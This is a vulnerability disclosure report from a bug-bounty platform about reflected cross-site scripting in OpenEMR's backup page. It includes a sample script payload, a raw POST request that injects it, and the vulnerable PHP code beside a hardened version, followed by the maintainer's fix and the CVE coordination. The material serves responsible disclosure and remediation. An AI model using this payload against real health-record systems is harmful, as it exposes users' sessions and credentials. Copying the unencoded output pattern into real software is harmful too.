Reflected Cross Site Scripting in OpenEMR 7.0.0 and below at backup in openemr/openemr

Valid

Reported on

Jul 19th 2022


Description

We would like to report a vulnerability we found during software testing. OpenEMR 7.0.0 (the latest version) and earlier versions of this open-source electronic health records and medical practice management application have a Reflected Cross Site Scripting vulnerability in the {form_status} parameter of the backup page. It has never been reported before (we checked the official CVE website).

Vulnerability Type

Reflected Cross Site-Scripting (XSS)

Affected Page/URL

https://<openemrurl>/interface/main/backup.php {form_status}

Sample XSS Payload

' /><script>alert(`CVE_Hunting_XSS`)</script>

Vulnerable Source Code

/var/www/localhost/htdocs/openemr/interface/main/backup.php (Please see more details in the occurrences section)

Implication

This vulnerability allows an attacker to embed arbitrary JavaScript code in the Web UI, altering the intended functionality and potentially leading to credential disclosure within a trusted session.

Recommendation

Whitelist validation should be performed on the server side for all input fields and parameters in the entire application, to ensure that only valid input is processed. The validation should decode any encoded input and then validate the length, characters, format, and any business rules on that data before accepting it. Special characters such as `'/;&*()%!+{}[]|# including Carriage Return (ASCII 1, \r, %0d) as well as Line Feed (ASCII 10, \n, %0a) should be filtered out before the server processes form fields and hidden form fields. Where special characters must be allowed in an input field, the application should use a standard function to "escape" them. Alternatively, all parameters returned to the user's browser should be sanitized so that client-side scripting attacks are not effective. Output HTML encoding should be properly implemented to prevent execution of malicious script in the user's browser.

Discoverer/Reporters

  • Ammarit Thongthua, Rattapon Jitprajong and Nattakit Intarasorn from Secure D Center Research Team

Example PoC Screenshots

OpenEMR Version 6.1.0

CVEHunting-Open-EMR-6-1-0-version.png

OpenEMR Version 7.0.0

Screen-Shot-2022-07-20-at-3-18-07-PM.png

Backup Page

CVEHunting-Open-EMR-6-1-0-Backup.png

Click Create Backup or Create Eventlog Backup, then inject the malicious JavaScript payload into {form_status} using the Sample XSS Payload:

POST /interface/main/backup.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------134273974110212498243185026588
Content-Length: 626
Origin: https://localhost
Connection: close
Referer: https://localhost/interface/main/backup.php
Cookie: OpenEMR=sDB13cXmxjjPS6d-BF8dtr9D5Kj8PkbOg2oMdxqSKMMo1C7Y
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------134273974110212498243185026588
Content-Disposition: form-data; name="csrf_token_form"

4a2e4c79d44d123017f7ff6850e337c8c17557e3
-----------------------------134273974110212498243185026588
Content-Disposition: form-data; name="form_backup"

ggwp
-----------------------------134273974110212498243185026588
Content-Disposition: form-data; name="form_step"

ggwp
-----------------------------134273974110212498243185026588
Content-Disposition: form-data; name="form_status"

' /><script>alert(`CVE_Hunting_XSS`)</script>
-----------------------------134273974110212498243185026588--

CVEHunting-Open-EMR-6-1-0-Po-C.png

Rendered Malicious JavaScript (XSS)

CVEHunting-Open-EMR-6-1-0-XSS-Renderred.png

Occurrences

// backup.php, step 203 handler: $form_status (attacker-controlled via POST) is echoed without HTML encoding
if ($form_step == 203) {
    $form_status .= xla('Done') . ".";
    echo nl2br($form_status);
}

// backup.php, step 1 handler (remainder of the block elided)
if ($form_step == 1) {
    $form_status .= xla('Dumping OpenEMR database') . "...<br />";
    echo nl2br($form_status);
    if (file_exists($TAR_FILE_PATH)) {
        if (! unlink($TAR_FILE_PATH)) {
            die(xlt("Couldn't remove old backup file:") . " " . text($TAR_FILE_PATH));
        }
    }
    // ...

// backup.php, HTML template: hidden field that carries $form_status between steps,
// written into a single-quoted attribute without encoding (this is what the ' /> prefix of the payload breaks out of)
<input type='hidden' name='form_status' value='<?php echo $form_status; ?>' />

// backup.php, step 202 handler
if ($form_step == 202) {
  // Process uploaded config file.
    if (is_uploaded_file($_FILES['userfile']['tmp_name'])) {
        if (move_uploaded_file($_FILES['userfile']['tmp_name'], $EXPORT_FILE)) {
            $form_status .= xla('Applying') . "...<br />";
            echo nl2br($form_status);
            $cmd = escapeshellcmd($mysql_cmd) . " -u " . escapeshellarg($sqlconf["login"]) .
            " -p" . escapeshellarg($sqlconf["pass"]) .
            " -h " . escapeshellarg($sqlconf["host"]) .
            " --port=" . escapeshellarg($sqlconf["port"]) .
            " $mysql_ssl " .
            escapeshellarg($sqlconf["dbase"]) .
            " < " . escapeshellarg($EXPORT_FILE);
        } else {
            echo xlt('Internal error accessing uploaded file!');
            $form_step = -1;
        }
    } else {
        echo xlt('Upload failed!');
        $form_step = -1;
    }

    $auto_continue = true;
}

// backup.php, step 3 handler (remainder of the block elided)
if ($form_step == 3) {
    $form_status .= xla('Dumping OpenEMR web directory tree') . "...<br />";
    echo nl2br($form_status);
    $cur_dir = getcwd();
    chdir($webserver_root);
    // ...

// backup.php, step 103 handler
if ($form_step == 103) {
    $form_status .= xla('Done.  Will now send download.') . "<br />";
    echo nl2br($form_status);
    $auto_continue = true;
}
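The two sinks above, reduced to a stand-alone script beside an output-encoded version. This is an added example written for this report, not OpenEMR code; it uses plain htmlspecialchars() instead of OpenEMR's helpers, and the only input is the report's sample payload, embedded as a constructed $_POST value.

```php
<?php
// Added example (not OpenEMR code): the reflected-XSS pattern from backup.php,
// reduced to its two output contexts, beside an output-encoded version.
// Constructed input: the report's sample payload as it arrives in $_POST['form_status'].
$untrusted = "' /><script>alert(`CVE_Hunting_XSS`)</script>";

// Vulnerable pattern (as in the report): the raw value goes into a single-quoted
// attribute and, via nl2br(), into the page body.
function render_vulnerable(string $form_status): string
{
    $out  = "<input type='hidden' name='form_status' value='" . $form_status . "' />\n";
    $out .= nl2br($form_status . "Done.");
    return $out;
}

// Hardened pattern: encode for the HTML context before use. ENT_QUOTES matters here
// because the attribute is single-quoted; ENT_COMPAT (the default before PHP 8.1)
// leaves ' alone, and the payload's leading ' /> would still close the attribute.
function esc(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_hardened(string $form_status): string
{
    $out  = "<input type='hidden' name='form_status' value='" . esc($form_status) . "' />\n";
    // Escape first, then nl2br(): the <br /> tags nl2br() inserts must stay as markup.
    // Escaping after nl2br() would neutralise the line breaks instead of the payload.
    $out .= nl2br(esc($form_status . "Done."));
    return $out;
}

// Reviewer check: does a <script> tag survive into the rendered output?
function contains_script(string $html): bool
{
    return stripos($html, '<script') !== false;
}

$vuln = render_vulnerable($untrusted);
$safe = render_hardened($untrusted);

echo "vulnerable output contains <script>: ", var_export(contains_script($vuln), true), "\n";
echo "hardened output contains <script>:   ", var_export(contains_script($safe), true), "\n";
echo $safe, "\n";
```

Because the hidden field round-trips $form_status through the client on every step, the value must be treated as untrusted on each request regardless of which step wrote it; encoding at both sinks, not input filtering alone, is what closes the attribute break-out.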
We are processing your report and will contact the openemr team within 24 hours. (2 months ago)
JohnNattakit modified the report (2 months ago)
JohnNattakit modified the report (2 months ago)
JohnNattakit modified the report (2 months ago)
We have contacted a member of the openemr team and are waiting to hear back. (2 months ago)
JohnNattakit modified the report (2 months ago)
We have sent a follow up to the openemr team. We will try again in 7 days. (2 months ago)
openemr/openemr maintainer validated this vulnerability (2 months ago)

Thanks for the report. Working on a fix now.

JohnNattakit has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
We have sent a fix follow up to the openemr team. We will try again in 7 days. 2 months ago
Brady Miller
2 months ago

Maintainer


A preliminary fix has been posted in commit 285fb234bd27ea4c46a29f2797edda7f38f1d8db

Please do not create a CVE # or make this vulnerability public at this time. I will make this fix official about 1 week after we release 7.0.0 patch 1 (7.0.0.1), which will likely be in about 3-7 weeks. After I do that, then will be ok to make CVE # and make it public.

Thanks!

We have sent a second fix follow up to the openemr team. We will try again in 10 days. 2 months ago
JohnNattakit
2 months ago

Researcher


Dear @Brady Miller, @admin Hope you are doing well. We have got the notification email that the 1st patch for OpenEMR 7.0.0 has been released. Can the CVE be assigned to this issue? Screen-Shot-2022-08-08-at-9-48-42-AM.png

Jamie Slome
a month ago

Admin


Just waiting for the go-ahead from the maintainer and then we can assign and publish a CVE for this report 👍

Brady Miller confirmed that a fix has been merged on 285fb2 a month ago
The fix bounty has been dropped
backup.php#L549 has been validated
backup.php#L903 has been validated
backup.php#L503 has been validated
backup.php#L1029 has been validated
backup.php#L923 has been validated
backup.php#L945 has been validated
Brady Miller
a month ago

Maintainer


OpenEMR patch 1 (7.0.0.1) has been released, so this has been fixed. You have permission to make CVE # and make this public.

JohnNattakit
a month ago

Researcher


Dear @Admin, @Jamie Slome, could you please help to assign the CVE for this finding? Thanks, and I appreciate your help 👍

@Brady Miller Thanks for your response 👍

Jamie Slome
a month ago

Admin


CVE assigned and will automatically publish in the next few hours ♥️

JohnNattakit
a month ago

Researcher


@Jamie Slome I appreciate your contribution 👍♥️
